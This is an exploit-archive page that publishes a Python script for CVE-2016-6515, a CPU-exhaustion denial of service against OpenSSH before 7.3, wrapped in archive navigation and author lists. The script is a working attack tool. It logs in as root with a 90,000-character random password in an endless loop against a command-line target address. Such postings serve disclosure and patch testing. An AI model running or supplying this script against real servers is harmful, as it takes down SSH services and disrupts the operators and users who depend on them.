OpenSSH 7.2 Denial Of Service

OpenSSH 7.2 Denial Of Service: Posted Dec 8, 2016; Authored by Kashinath T | Site secpod.com; OpenSSH versions 7.2 and below crypt CPU consumption denial of service exploit.; tags | exploit, denial of service; advisories | CVE-2016-6515; SHA-256 | 85813c4a45e54ff563c3ade3e42af0997614ba11790f829f24352c73b552928d; Download | Favorite | View

OpenSSH 7.2 Denial Of Service

################################################################################
# Title     : OpenSSH before 7.3 Crypt CPU Consumption (DoS Vulnerability)
# Author    : Kashinath T (tkashinath@secpod.com) (www.secpod.com)
# Vendor    : http://www.openssh.com/
# Software  : http://www.openssh.com/
# Version   : OpenSSH before 7.3
# Tested on : Ubuntu 16.04 LTS, Centos 7
# CVE       : CVE-2016-6515
# Date      : 20-10-2016
#
# NOTE:
# If the remote machine is installed and running OpenSSH version prior to 7.3,
# it does not limit the password length for authentication. Hence, to exploit
# this vulnerability' we will send a crafted data which is of 90000 characters
# in length to the 'password' field while attempting to log in to a remote
# machine via ssh with username as 'root'.
#
# For more info refer,
# http://www.secpod.com/blog/openssh-crypt-cpu-consumption
################################################################################
 
import sys
from random import choice
from string import lowercase
 
try:
    import paramiko
except ImportError:
    print "[-] python module 'paramiko' is missing, Install paramiko with" \
          " following command 'sudo pip install paramiko'"
    sys.exit(0)
 
 
class ssh_exploit:
 
    def __init__(self):
        """
        Initialise the objects
        """
 
    def ssh_login(self, remote_ip):
 
        try:
            # Crafted password of length 90000
            passwd_len = 90000
            crafted_passwd = "".join(choice(lowercase)
                                     for i in range(passwd_len))
 
            # Connect to a remote machine via ssh
            ssh = paramiko.SSHClient()
            ssh.load_system_host_keys()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 
            # calling connect in infinite loop
            print "[+] Entering infinite loop"
            while 1:
                ssh.connect(remote_ip, username='root',
                            password=crafted_passwd)
 
        except Exception, msg:
            print "Error in connecting to remote host : ", remote_ip
            print "Exception in : ssh_login method."
            sys.exit(msg)
 
 
def main():
 
    if len(sys.argv) != 2:
        print "usage: python openssh_crypt_cpu_consumption_dos.py 192.168.x.x"
        sys.exit()
 
    # Calling ssh_connect
    ref_obj = ssh_exploit()
    ref_obj.ssh_login(sys.argv[1])
 
 
if __name__ == "__main__":
    main()

Top Authors In Last 30 Days

Red Hat 259 files
Ubuntu 85 files
Gentoo 29 files
indoushka 26 files
Debian 11 files
Sina Kheirkhah 7 files
tmrswrr 7 files
Rodolfo Tavares 4 files
S. Dietz 2 files
Google Security Research 2 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,527)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,402)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,689)
UNIX (9,431)
UnixWare (187)
Windows (6,667)
Other

OpenSSH 7.2 Denial Of Service

OpenSSH 7.2 Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OpenSSH 7.2 Denial Of Service

Share This

OpenSSH 7.2 Denial Of Service

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems